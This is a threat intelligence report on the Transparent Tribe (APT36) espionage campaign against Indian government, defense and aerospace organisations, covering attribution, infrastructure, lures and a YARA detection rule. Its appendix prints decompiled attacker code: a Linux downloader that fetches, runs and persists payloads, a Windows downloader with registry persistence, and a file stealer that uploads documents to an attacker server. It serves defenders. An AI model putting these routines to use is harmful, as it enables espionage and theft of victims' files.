Transparent Tribe Targets Indian Government, Defense, and Aerospace Sectors Leveraging Cross-Platform Programming Languages

As part of our continuous hunting efforts across the Asia-Pacific region, the Arctic Wolf® Labs team discovered Pakistani-based advanced persistent threat group Transparent Tribe (APT36) targeting the government, defense and aerospace sectors of India. This cluster of activity spanned from late 2023 to April 2024 and is anticipated to persist.

In Transparent Tribe’s prior campaigns, the group was seen adapting and evolving their toolkit. In recent months the group have been putting a heavy reliance on cross-platform programming languages such as Python, Golang and Rust, as well as abusing popular web services such as Telegram, Discord, Slack and Google Drive. We observed the group deploying a range of malicious tools mirroring those used in previous campaigns as well as newer iterations, which we assess with moderate to high confidence were indeed conducted by Transparent Tribe.

Throughout our investigations, we uncovered multiple artifacts that substantiate our attribution:

• We noted that a file served from the group’s infrastructure set the time zone (TZ) variable to “Asia/Karachi,” which is Pakistani Standard Time.
• We also discovered a remote IP address associated with a Pakistani-based mobile data network operator embedded within a spear-phishing email.
• The strategic targeting of critical sectors vital to India’s national security additionally suggests the group’s potential alignment with Pakistan’s interests.

Alongside familiar tactics, Transparent Tribe also introduced new iterations. They first used ISO images as an attack vector in October 2023, which we noted in their present campaigns. Arctic Wolf® discovered a new Golang compiled “all-in-one” espionage tool used by the group, which has the capability to find and exfiltrate files with popular file extensions, take screenshots, upload and download files, and execute commands.

Brief MITRE ATT&CK® Information

Weaponization and Technical Overview

Technical Analysis

What is Transparent Tribe?

Transparent Tribe, otherwise known as APT36, ProjectM, Mythic Leopard or Earth Karkaddan, is a cyber espionage threat group operating with a Pakistani nexus. The group has a history of conducting cyber espionage operations against India’s defense, government and education sectors. Despite not being overly sophisticated, the group actively adapts its attack vector as well as its toolkit to evade detection.

The group has been operational since approximately 2013. Previous reports highlighted operational security mistakes made by the group. Due to these mistakes, Transparent Tribe inadvertently linked themselves to Pakistan.

In this campaign uncovered by Arctic Wolf, we surmise that Transparent Tribe has been carefully monitoring the efforts of the Indian defense forces as they strive to bolster and upgrade the country’s aerospace defense capabilities.

Context

For many years, India and Pakistan have been in conflict over the Kashmir region, resulting in frequent cross-border clashes. Recent years have seen a notable escalation in tensions between the two nations, culminating in the current diplomatic freeze.

Considering the rise in tensions, and that both countries are currently experiencing significant political developments, it is no surprise to see a Pakistani-based threat group targeting critical sectors within India to gain a strategic advantage.

Attack Vector

Based on the sample set we looked at, Transparent Tribe primarily employs phishing emails as the preferred method of delivery for their payloads, utilizing either malicious ZIP archives or links. We observed the use of numerous different tools and techniques, some of which aligned with previous reporting from Zscaler in September 2023.

India has put significant efforts into the research and development of indigenized Linux-based operating systems such as MayaOS. MayaOS — developed internally by the Indian Defense Research and Development Organisation (DRDO), the Centre for Development of Advanced Computing (C-DAC), and the National Informatics Centre (NIC) — serves as an alternative to Windows. It is a hardened Linux distribution intended for adoption by the Indian Ministry of Defense (MoD) and subsequently the country’s Army, their Navy and their Airforce.

As a result, Transparent Tribe has chosen to focus heavily on the distribution of Executable and Linkable Format (ELF) binaries during this period.

Figure 1: Targeting of operating systems by Transparent Tribe.

Weaponization

In the past, Transparent Tribe has employed desktop entry files to deliver Poseidon payloads in ELF format. Poseidon is a Golang agent that compiles into Linux and macOS x64 executables. This agent is designed to be used with Mythic and open-source cross-platform red teaming frameworks.

Currently, Poseidon remains part of the group’s toolkit; however, we haven’t confirmed the specific attack vector employed for its distribution.

We did, however, see the distribution of a Python downloader script compiled into ELF binaries. These ELF binaries had minimal detections on VirusTotal likely due to their lightweight nature and dependency on Python. The first cluster of files we found had an embedded file name of aldndr.py; later versions had an embedded file name of basha.py. Once decompiled, the script performed the following actions:

Figure 2: Actions performed by decompiled script.

Bashd, basho and bashu are all variations of GLOBSHELL, a custom-built file exfiltration Linux utility, with bashu closely resembling the original version discovered by Zscaler. The core script is designed to monitor the “/media” directory, specifically targeting files with commonly used extensions such as .pdf, .docx, .xlsx, .xls, .jpg, .png, .pptx, and .odt.

Bashd and basho have a broader scope, encompassing a more extensive array of directories. They monitor for files with the following file extensions: .pdf, .ppt, .pptx, .doc, .docx, .xls, .xlsx, .ods, .jpeg and .jpg. The directories they check are:

• /home/{user}/Downloads
• /home/{user}/Documents
• /home/{user}/Desktop
• /home/{user}/Pictures
• /home/{user}/.local/share/Trash
• /media

Bashd has an additional check to only send files that were not accessed or modified yesterday, as seen in the code below.

try:
        for file in allfiles:
            path = Path(file)
            ts1 = date.fromtimestamp(path.stat().st_atime)
            ts2 = date.fromtimestamp(path.stat().st_mtime)
            ts3 = date.fromtimestamp(path.stat().st_ctime)
            today = date.today()
            yesterday = today - timedelta(days=1)

        if not (yesterday == ts1 or yesterday == ts2):
            if yesterday == ts3:
                pass
            list1.append(file)
    except:
        print('file not found error encountred')

* Note that “encountred” in the code shown above is a typo made by its original author.

Lastly, it’s worth noting that bashm closely resembles PYSHELLFOX, a tool used to exfiltrate the current user’s Firefox browser session details. It searches for open tabs with the following URLs: email.gov.in/#, inbox, or web.whatsapp.com.

In our retroactive search for similar samples, we discovered bash script versions and Python-based Windows binaries being served from Transparent Tribe’s infrastructure.

The first stage bash script stg_1.sh downloaded three files: swift_script.sh, Silverlining.sh and swif_uzb.sh. The file stg_1.sh acted very much like the above downloaders, downloading files and registering the files to run at startup. An interesting part of Swift_script.sh was that it set the time-zone variable (TZ) to “Asia/Karachi,” a Pakistani time zone.

Windows

We also discovered a Python-based Windows downloader afd.exe, equivalent to aldndr.py or basha.py but compiled into a Windows executable. It performs similar actions to its Linux counterpart; its core task is to download two executables and set them to run on startup by adding a registry key to CurrentVersion\\Run.

Win_service.exe and win_hta.exe are Windows versions of GLOBSHELL. The code is almost identical to bashd and basho respectively in terms of logic. The code was adapted to work on Windows file system paths. Based on the compilation timestamps of all three Windows executables, it’s likely they were developed around the same time.

Figure 3: Attack chain of GLOBSHELL for Windows. (Click to enlarge.)

The “All-in-One” Espionage Tool

Arctic Wolf also discovered a new Golang compiled “all-in-one” espionage tool. A pivot from Transparent Tribe’s domain clawsindia[.]in led to a ZIP archive containing an ELF file DSOP_Fund_Nomination_Form. The file is a downloader written in Golang and packed with UPX.

Upon execution, the downloader retrieves two files. The first is a PDF — hxxps[:]//clawsindia[.]in/DSOP/DSOP.pdf — which acts as a lure for the victim. The second is the final payload of this attack chain: hxxps[:]//clawsindia[.]in/vmcoreinfo.

The subsequent payload is a modified version of an open-source project Discord-C2, written in Golang and UPX packed. The code was modified to include similar logic as GLOBSHELL and PYSHELLFOX along with other capabilities described in figure 4 below.

Figure 4: DSOP_Fund_Nomination_Form attack chain and core capabilities.

ISO Images

On further inspection, we found that the domain www[.]twff247[.]cloud/ was hosting an ISO image. Metadata extracted from a shortcut file bundled within the ISO image indicated this was the group’s first attempt at delivering ISO images as an attack vector. Although the LocalBasePath references HTML Smuggling, there was no evidence to suggest the actual implementation of this technique by the threat group.

Figure 5: ExifTool file metadata.

Pivoting on the MachineID desktop-rp8bjk8 extracted from the metadata of the shortcut file led us to a second ISO image, Pay statement.iso, created six days prior to AG_Branch.iso. The LocalBasePath of the second shortcut file was as follows:

E:\\\\PC Files\\\\1st delivery underdevelopment\\\\iso\\\\Nodal Officer for SPARSH (PBORs)  Record officewise\\\\Nodal Officer for SPARSH (PBORs)  Record officewise.bat

Both ISOs delivered the same tool: a Python-based Telegram bot compiled with Nutika into a Windows executable. We also observed the telegram remote access tool (RAT) being delivered via a WinRAR archive instead of an ISO image.

The PDF lures bundled within both ISOs target Indian Defense Forces. One pertains to the appointment of Nodal Officers for the System for Pension Administration (RAKSHA) (SPARSH), facilitating administrative tasks and support related to pension management. The other is an AG Branch education loan application for army personnel.

Connecting the Dots

It is evident the group is favoring the use of cross-platform programming languages, open-source offensive tooling and different web services for command-and-control (C2) or exfiltration.

In the beginning of 2024, reports and blogs surfaced detailing the deployment of malicious ISO images against entities in India by uncategorized threat actors. These deceptive ISO files, with themes and naming conventions, strongly suggest the target of these attacks was the Indian Air Force (IAF) or an entity associated with the IAF.

Figure 6: Unattributed attacks against entities in India using ISO images. (Click to enlarge.)

These ISO files and their bundled payloads had the hallmark of a Transparent Tribe attack chain. The file sharing platform oshi[.]at, used by the group in swift_script.sh for data exfiltration, was now being used to host the file SU-30_Aircraft_Procurement.zip. The payloads bundled within these ISO images are modified open-source offensive tools — Golang compiled information stealers that abuse Slack for data exfiltration — reflecting the characteristics seen in the Discord payload and other components of their attack chain.

Notably, around this time, the Indian government alongside the Defense Acquisition Council (DAC) took significant steps to bolster the Indian Air Force’s capabilities. This included issuing a tender to one of the largest aerospace and defense manufacturers in Asia for the procurement of 97 advanced Tejas fighter jets, and approving the upgrade of the Su-30 fighter fleet.

This collaborative effort focuses on modernizing and expanding the Indian Air Force’s fleet, underscoring the aerospace manufacturer’s pivotal role in strengthening national security and defense infrastructure, while also unfortunately making them a prime target for espionage campaigns.

Network Infrastructure

Transparent Tribe is known to use a wide array of tools, and we saw this threat actor utilize different network infrastructure for different tooling. For the Python-based espionage tooling, they stood up numerous domains for different functions:

Pivoting off the above domains led to our discovery of the following domains, which we attribute with high confidence to be part of Transparent Tribe’s infrastructure:

• warfarestudies[.]in
• coordoffice[.]in
• eoffice-sparrow[.]online
• secy-org[.]in
• publicinfo[.]in
• admincoord[.]in
• clawsindia[.]in
• emailnic-tech[.]email
• estbsec[.]in – Phishing domain mirroring a login page for the legitimate domain parichay.nic.in in/pnv1/assets/login.html.
• esttsec[.]in – 89[.]117[.]188[.]126 – Links to a report by legitimate enterprise cybersecurity solutions provider Seqrite.
• coordsec2[.]in
• awesindia[.]online

Over the course of 16 months, the group has stood up multiple domains bearing a striking resemblance to numerous legitimate Indian domains, most featuring a top-level domain (TLD) of “.in.” While some of these domains have been observed being actively used to host, deliver, and operate as exfiltration points within their broader campaign, the utilization of others remains unconfirmed. The group continues actively standing up domains up to the time of the publication of this report.

Figure 7: Domain creation timeline. (Click to enlarge.)

Web Services C2s

Targets

Transparent Tribe’s targeting during this time has been quite strategic. The groups’ primary focus during this period was on the Indian defense forces and state-run defense contractors. Historically, the group has primarily engaged in intelligence gathering operations against the Indian Military.

In September 2023, Arctic Wolf observed a spear-phishing email targeting numerous key stakeholders and clients of the Department of Defense Production (DDP), specifically those in the aerospace sector.

The spear-phishing email was directly sent to one of the largest aerospace and defense companies in Asia. It was also sent to an Indian state-owned aerospace and defence electronics company, and additionally to Asia’s second-largest manufacturer of earth moving equipment, which plays a key role in the country’s Integrated Guided Missile Development Project by supplying ground support vehicles. Key individuals within the DDP were carbon-copied.

It is worthy of note that all three companies targeted are headquartered in Bangalore, India.

Figure 8: Header of spear-phishing email sent to one targeted company.

Attribution

The Arctic Wolf Labs team assess with at least a moderate to high confidence level that the activity detailed in this report was likely conducted by Transparent Tribe. Throughout our investigations, we uncovered multiple artifacts that substantiate our attribution.

Firstly, we observed a significant overlap with previous Transparent Tribe campaigns, including code reuse across various tools, tactics, and techniques, as well as in network infrastructure.

Despite the group’s efforts to conceal its origins, several indicators discovered during our investigation point to the threat group likely residing in or operating from Pakistan.

For instance, during our analysis of one of the scripts, we noticed the threat actor set the time zone environment variable TZ to “Asia/Karachi,” which is Pakistani Standard Time. Additionally, the ISO image Pay statement.iso, first seen in early October and likely intended as an initial test for this attack vector, was submitted from Multan, Pakistan. Lastly, embedded within a spear-phishing email, we discovered a remote IP address (223[.]123.17[.]36) associated with mobile data network operator CMPak Limited, which is Pakistan-based and owned by China Mobile (CMPak Limited – ASN AS59257). We have included a comprehensive list of indicators of compromise (IOCs) at the end of this report.

The strategic targeting of key entities within India’s Department of Defense Production and the Indian Defense Forces suggests the threat group’s potential alignment with Pakistan’s interests.

Conclusions

Our investigation reveals Transparent Tribe has been persistently targeting critical sectors vital to India’s national security.

This threat actor continues to utilize a core set of Tactics, Techniques, and Procedures (TTPs), which they have been adapting over time. The group’s evolution in recent months has primarily revolved around its utilization of cross-platform programming languages, open-source offensive tools, attack vectors, and web services.

These actions align with heightened geopolitical tensions between India and Pakistan, implying a strategic motive behind Transparent Tribe’s activities. This activity is expected to continue.

Indicators of Compromise (IOCs)

Applied Countermeasures

Yara Rule

rule targeted_TransparentTribe_Discord_Espionage_Tool_unpacked : golang discord c2 espionage tool unpacked
{
    meta:
        description = "Rule to detect Transparent Tribes unpacked golang discord-c2 espionage tool"
        author = "The Arctic Wolf Labs team"
        version = "1.0"
        last_modified = "2024-05-17"
        hash1_sha256 = "dc923cf31740858e6c54a1ff84fcb61e815a42d7177d0b067649f64d3fae56f6"

    strings:
        $s1 = "discord-c2" ascii
        $s2 = "kbinani/screenshot" ascii
        $s3 = "firefox profile" ascii nocase
        $s4 = "parent.lock"
        $s5 = "zip" ascii
        $s6 = "*.doc*.pdf*.xls*.ppt*.jpg*.zip*.rar*.tar*.iso*.csv*.sql*.odt*.ods" ascii
        $s7 = "@reboot /bin/bash -c" ascii
        $s8 = "oshi.at" ascii
        $s9 = "curl"
        $s10 = "transfer.sh" ascii
        $s11 = "--upload-file"
        $s12 = "golang"

    condition:
        (uint16(0) == 0x457f or uint16(0) == 0x5a4d) and all of ($s*)
}

Detailed MITRE ATT&CK® Mapping

ELF Downloader Script

import os

user = os.getlogin()
os.system('xdg-open hxxps[:]//drive.google[.]com/file/d/1fbfU_bm4VMo3YH8WSpheWt31Qjd9iU2s/view?usp=drive_link')
b = f"\n[Desktop Entry]\nType=Application\nName=bssd.desktop\nExec=/home/{user}/.config/bssd\nIcon=pdf\nComment=important application\nX-GNOME-Autostart-enabled=true\nName[en_US]=bssd.desktop\n\n"
os.system('mkdir -p ~/.config/autostart')
os.system(f"printf '{b}'>>~/.config/autostart/bssd.desktop")
os.system('chmod +x ~/.config/autostart/bssd.desktop')
c = f"\n[Desktop Entry]\nType=Application\nName=bssu.desktop\nExec=/home/{user}/.config/bssu\nIcon=pdf\nComment=important application\nX-GNOME-Autostart-enabled=true\nName[en_US]=bssu.desktop\n"
os.system(f"printf '{c}'>> ~/.config/autostart/bssu.desktop")
os.system('chmod +x ~/.config/autostart/bssu.desktop')
d = f"\n[Desktop Entry]\nType=Application\nName=bssm.desktop\nExec=/home/{user}/.config/bssm\nIcon=pdf\nComment=important application\nX-GNOME-Autostart-enabled=true\nName[en_US]=bssm.desktop\n\n"
os.system(f"printf '{d}'>>~/.config/autostart/bssm.desktop")
os.system('chmod +x ~/.config/autostart/bssm.desktop')
os.system('mkdir -p ~/.config')
os.system('rm -f ~/.config/bssd || true')
os.system('wget hxxps[:]//files.tpt123[.]com/bssd -O ~/.config/bssd')
os.system('chmod +x ~/.config/bssd')
os.system('wget hxxps[:]//files.tpt123[.]com/bsso -O ~/.config/bsso')
os.system('chmod +x ~/.config/bsso')
os.system('wget hxxps[:]//files.tpt123[.]com/bssu -O ~/.config/bssu')
os.system('chmod +x ~/.config/bssu')
os.system('wget hxxps[:]//files.tpt123[.]com/ -O ~/.config/bssm')
os.system('chmod +x ~/.config/bssm')
os.system('nohup ~/.config/bssd &')
os.system('nohup ~/.config/bsso &')
os.system('nohup ~/.config/bssu &')
os.system('nohup ~/.config/bssm &')

Windows Downloader Script

# Embedded file name: afd.py
from pyshortcuts import make_shortcut
import os, urllib.request, getpass

username = getpass.getuser()
import shutil, webbrowser, subprocess
from atost import *
from atostone import *
import wget, ssl
context = ssl._create_unverified_context
furl = 'hxxps[:]//www[.]twff247[.]cloud/win_service.zip'
furl2 = ‘hxxps[:]//www[.]twff247[.]cloud/win_hta.zip'
os.system(f'if not exist "C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive" mkdir  "C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive"')
dest1 = f"C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive\\\\win_service.zip"
dest2 = f"C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive\\\\win_hta.zip"
if os.path.exists(dest1):
  os.remove(dest1)
if os.path.exists(dest2):
  os.remove(dest2)
wget.download(furl, dest1)
wget.download(furl2, dest2)
extract_dir = f"C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive"
shutil.unpack_archive(dest1, extract_dir)
shutil.unpack_archive(dest2, extract_dir)
scfile = f"C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive\\\\win_service.exe"
scfile1 = f"C:\\\\Users\\\\{username}\\\\AppData\\\\Roaming\\\\drive\\\\win_hta.exe"
subprocess.Popen([scfile1], shell=True)
set_autostart_registry('win_service', scfile)
set_autostart_registry1('win_hta', scfile1)

Windows GLOBSHELL Script

# Embedded file name: win_hta.py
import os, string, glob, socket, urllib.request, requests
from datetime import datetime
import time
user = os.getlogin()
myhost = socket.gethostname()
eip = urllib.request.urlopen('https://ident.me').read().decode('utf8')
now = datetime.now()
current_time = now.strftime('%H:%M:%S')
while True:
    try:
        if requests.get('https://google.com').ok:
            break
    except:
        time.sleep(2)

af = []
drives = [chr(x) + ':' for x in range(65, 91) if os.path.exists(chr(x) + ':')]
for drive in drives:
    try:
        allfiles = glob.glob(f"{drive}\\**\\*.zip", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.pdf", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.doc", recursive=True)
        allfiles += glob.glob(f" {drive}\\**\\*.docx", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.ppt", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.pptx", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.xls", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.xlsx", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.jpg", recursive=True)
        allfiles += glob.glob(f"{drive}\\**\\*.jpeg", recursive=True)
        af.extend(allfiles)
    except:
        print('some file is missing')
    else:
        url = 'hxxps[:]//winp247[.]cloud/mffr/trg/fu.php'
        for f in af:
            try:
                files = {'testfile': open(f, 'rb')}
                data = {'uname': 'user', 'host': 'myhost', 'eip': 'eip', 'ct': 'current_time'}
                r = requests.post(url, files=files, params=data)
                print(r.status_code)
            except:
                pass

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.